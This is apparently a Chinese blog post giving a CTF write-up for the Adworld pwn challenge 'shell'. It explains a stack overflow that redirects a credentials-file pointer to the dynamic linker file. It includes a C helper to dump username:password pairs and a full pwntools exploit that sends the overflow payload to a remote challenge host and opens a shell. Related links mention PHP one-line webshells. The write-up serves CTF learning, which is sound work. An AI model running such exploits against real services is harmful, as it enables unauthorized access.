攻防世界 进阶 shell

最新推荐文章于 2022-05-29 21:09:58 发布
最新推荐文章于 2022-05-29 21:09:58 发布
阅读量176 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113913531
版权

保护

在这里插入图片描述

分析一下程序。
在这里插入图片描述
只能先login命令登陆。
login之后就输入用户名,密码。
用户名,密码输入的时候明显能看得到溢出。

在这里插入图片描述
要介绍个新函数。
C 库函数 char *strtok(char *str, const char *delim) 分解字符串 str 为一组字符串,delim 为分隔符。

程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码。

那么整个的流程就看得出来是读入用户名密码,然后跟文件中的进行比较,比较成功就登陆成功。

那么我们可以考虑将文件指针覆盖掉,就覆盖成它给的那个文件,那么我们先读出来那个文件里面有什么。

在这里插入图片描述

#include <stdio.h>  
#include <string.h>  
int main() {  
    FILE *f = fopen("/lib64/ld-linux-x86-64.so.2","r");  
    char *buf = NULL;  
    size_t n;  
    if (f == NULL) {  
        printf("error\n");  
    }  
    while (getline(&buf,&n,f) != -1) {  
        char* user = strtok(buf, ":");  
        char* pwd = strtok(0LL, ":");  
        printf("%s:%s\n",user,pwd);  
    }  
    fclose(f);  
    return 0;  
}

要去vim里面去写,Dc里面过不去。strtok函数在string.h里面,注意加头文件。

在这里插入图片描述
然后里面随便找一组数据。就可以了。

#coding:utf8  
from pwn import *  
  
r = remote("111.200.241.244",57276)  
    
r.sendline('login')  
r.sendlineafter('Username: ','yongbaoii')  

payload = 'a'*0x44 + p64(0x400200)  
r.sendlineafter('Password: ',payload)  
  
r.sendlineafter('Authentication failed!','login')  
r.sendlineafter('Username: ','prelink checking')  
r.sendlineafter('Password: ',' %s')
  
r.sendlineafter('Authenticated!','sh')  
  
  
r.interactive()
yongbaoii
关注
专栏目录
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 6926
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
攻防世界进阶题note_service2: 堆区第一题!
weixin_48066554的博客
03-16 344
note_service: 堆区第一题! 拿到题目,按惯例checksec: 发现开了PIE和Canary,这意味着我们不能愉快地ret2text了,有点难受,但是没开NX,那不就ret 2 system call 一把梭哈了吗 丢到ida里看一下(为方便阅读,已将部分函数名、变量名进行了更改): 反汇编 1、程序主体 void choice() { while ( 1 ) { menu(); printf("your choice>> "); switch (
攻防世界-PWN-shell
aptx4869_li的博客
05-29 351
攻防世界-PWN-shell 检查保护机制 healer@healer-virtual-machine:~/Desktop/shell$ checksec shell [*] '/home/healer/Desktop/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x4000
攻防世界-pwn-新手-get_shell
weixin_31610083的博客
10-12 887
【题目描述】 运行就能拿到shell呢,真的 【附件】 一个文件 【过程及思路】 文件没有后缀。 直接丢到虚拟机(linux)里,改名为get_shell。 发现文件还没有执行权限,那就自己加上: Chmod +x get_shell 其中filename是附件的名字。 执行了出来是这个样子。 就这?? 确实拿到shell了,只不过是自己的shell…这个题目提示越来越皮了。 看了一下别人的WP,直接连给出的地址和端口就行。 Pwn代码: from pwn...
攻防世界PWN之shell题解
seaaseesa的博客
11-22 1442
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
攻防世界webshell
知足且坚定,温柔且上进
01-23 4978
这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里 打开页面,出现一句话木马 使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加 点击进入添加的地址: 拿到flag ...
攻防世界进阶noleak
qq_42728977的博客
04-07 404
题目:XCTF 4th-QCTF-2018 noleak 难度:**** 漏洞点:UAF \unsorted bin sttack\partial write bypass PIE\unlink 参考链接: 伪造堆块绕过unlink检查(ctf-QiangWangCup-2015-shellman) 攻防世界PWN之Noleak(一题学了好多知识)题解 ctfwiki CTF pwn 中最通俗易懂...
攻防世界高手进阶区通关教程(2)
玄道的网安博客
05-16 2806
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2449
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界 webj进阶
舞动的獾
08-01 1820
cat 攻防世界cat 原理: php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符...
初学pwn-攻防世界(get_shell)
天柱的博客
08-26 1776
初学pwn - writeUp 从攻防世界新手区的第一道题目开始,首先是get_shell,题目上说这道题很贱单,运行就可以获取shell。这里首先使用到的工具是nc(netcat)。 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。使用它你可以轻易的建立任何连接。内建有很多实用的工具。功能非常强大,这里列举一下百度到的内容,这里就算了,之后再专门介绍一下。 telnet / 获取系统 banner 信息 传输文本信息 传输文件和目录 加密传输文件 端口扫描 远程控制 / 正方向 shel
攻防世界 web webshell
Kni9hT's Blog
03-01 3382
做题两分钟,工具两小时 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 所谓的php一句话:<?php @eval($_POST['shell']);?> 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后...
攻防世界——pwn_forgot
syk的博客
05-28 1710
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25
重新启程
12-27 751
题目地址:shell 这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵 看看保护机制 [*] '/ctf/work/python/shell/shell' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled ...
XCTF攻防世界web新手练习_ 8_webshell
热门推荐
silence1_的博客
04-29 1万+
XCTF攻防世界web新手练习—webshell 题目 题目为webshell,描述中,重点:把它放在了index.php里 打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀,添加,输入url,输如密码,连接成功, 一气呵成! 菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag! ...
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2867
get_shell
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8319
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7026
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5892
尝试过很多解决方案之后无果 决定研究一下它的整个流程
攻防世界get_shell
最新发布
03-16
"攻防世界"是一个网络安全竞赛平台,"get_shell" 是其中一种比赛任务类型。该任务的目标是通过漏洞攻击,成功获得目标系统的 Shell 权限,从而掌控该系统。这是一个非常具有挑战性的任务,需要竞赛选手具备扎实的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值